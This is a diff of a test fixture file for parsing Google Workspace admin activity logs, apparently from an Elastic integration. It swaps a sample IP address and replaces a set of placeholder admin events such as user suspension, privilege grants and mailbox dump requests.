-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"SUSPEND_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UNARCHIVE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UNDELETE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UNSUSPEND_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UPGRADE_USER_TO_GPLUS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"USERS_BULK_UPLOAD","parameters":[{"name":"BULK_UPLOAD_FAIL_USERS_NUMBER","value":"0"},{"name":"BULK_UPLOAD_TOTAL_USERS_NUMBER","value":"10"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"USERS_BULK_UPLOAD_NOTIFICATION_SENT","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DELETE_2SV_SCRATCH_CODES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"GENERATE_2SV_SCRATCH_CODES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REVOKE_3LO_DEVICE_TOKENS","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REVOKE_3LO_TOKEN","parameters":[{"name":"APP_ID","value":"id"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"ADD_RECOVERY_EMAIL","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"ADD_RECOVERY_PHONE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"GRANT_ADMIN_PRIVILEGE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REVOKE_ADMIN_PRIVILEGE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REVOKE_ASP","parameters":[{"name":"ASP_ID","value":"id"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"TOGGLE_AUTOMATIC_CONTACT_SHARING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"BULK_UPLOAD","parameters":[{"name":"BULK_UPLOAD_FAIL_USERS_NUMBER","value":"1"},{"name":"BULK_UPLOAD_TOTAL_USERS_NUMBER","value":"10"},{"name":"DOMAIN_NAME","value":"example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"BULK_UPLOAD_NOTIFICATION_SENT","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"DOMAIN_NAME","value":"example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CANCEL_USER_INVITE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"DOMAIN_NAME","value":"example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_CUSTOM_FIELD","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_CUSTOM_FIELD","value":"custom"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_EXTERNAL_ID","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_GENDER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_IM","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"ENABLE_USER_IP_WHITELIST","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_KEYWORD","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_LANGUAGE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_LOCATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_ORGANIZATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_PHONE_NUMBER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_RECOVERY_EMAIL","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_RECOVERY_PHONE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_RELATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_ADDRESS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CREATE_EMAIL_MONITOR","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"BEGIN_DATE_TIME","value":"2002-10-02T15:00:00Z"},{"name":"EMAIL_MONITOR_DEST_EMAIL","value":"dest@example.com"},{"name":"EMAIL_MONITOR_LEVEL_CHAT","value":"info"},{"name":"EMAIL_MONITOR_LEVEL_DRAFT_EMAIL","value":"info"},{"name":"EMAIL_MONITOR_LEVEL_INCOMING_EMAIL","value":"info"},{"name":"EMAIL_MONITOR_LEVEL_OUTGOING_EMAIL","value":"info"},{"name":"END_DATE_TIME","value":"2002-10-02T16:00:00Z"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CREATE_DATA_TRANSFER_REQUEST","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"DESTINATION_USER_EMAIL","value":"dest@example.com"},{"name":"APPLICATION_NAME","value":"a,b,c"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"GRANT_DELEGATED_ADMIN_PRIVILEGES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DELETE_ACCOUNT_INFO_DUMP","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"REQUEST_ID","value":"id"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DELETE_EMAIL_MONITOR","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"EMAIL_MONITOR_DEST_EMAIL","value":"dest@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DELETE_MAILBOX_DUMP","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"REQUEST_ID","value":"id"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_FIRST_NAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"GMAIL_RESET_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"GMAIL_RESET_REASON","value":"reason"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_LAST_NAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"MAIL_ROUTING_DESTINATION_ADDED","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"MAIL_ROUTING_DESTINATION_REMOVED","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"ADD_NICKNAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"USER_NICKNAME","value":"nick"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REMOVE_NICKNAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"USER_NICKNAME","value":"nick"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_PASSWORD","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_PASSWORD_ON_NEXT_LOGIN","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DOWNLOAD_PENDING_INVITES_LIST"}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REMOVE_RECOVERY_EMAIL","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REMOVE_RECOVERY_PHONE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REQUEST_ACCOUNT_INFO","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REQUEST_MAILBOX_DUMP","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"BEGIN_DATE_TIME","value":"2002-10-02T15:00:00Z"},{"name":"EMAIL_EXPORT_INCLUDE_DELETED","value":"true"},{"name":"EMAIL_EXPORT_PACKAGE_CONTENT","value":"contents"},{"name":"SEARCH_QUERY_FOR_DUMP","value":"foo bar"},{"name":"END_DATE_TIME","value":"2002-10-02T16:00:00Z"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"RESEND_USER_INVITE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"RESET_SIGNIN_COOKIES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"SECURITY_KEY_REGISTERED_FOR_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REVOKE_SECURITY_KEY","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"USER_INVITE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"VIEW_TEMP_PASSWORD","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"TURN_OFF_2_STEP_VERIFICATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UNBLOCK_USER_SESSION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UNENROLL_USER_FROM_TITANIUM","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"ARCHIVE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UPDATE_BIRTHDATE","parameters":[{"name":"BIRTHDATE","value":"2002-10-02T15:00:00Z"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CREATE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} 
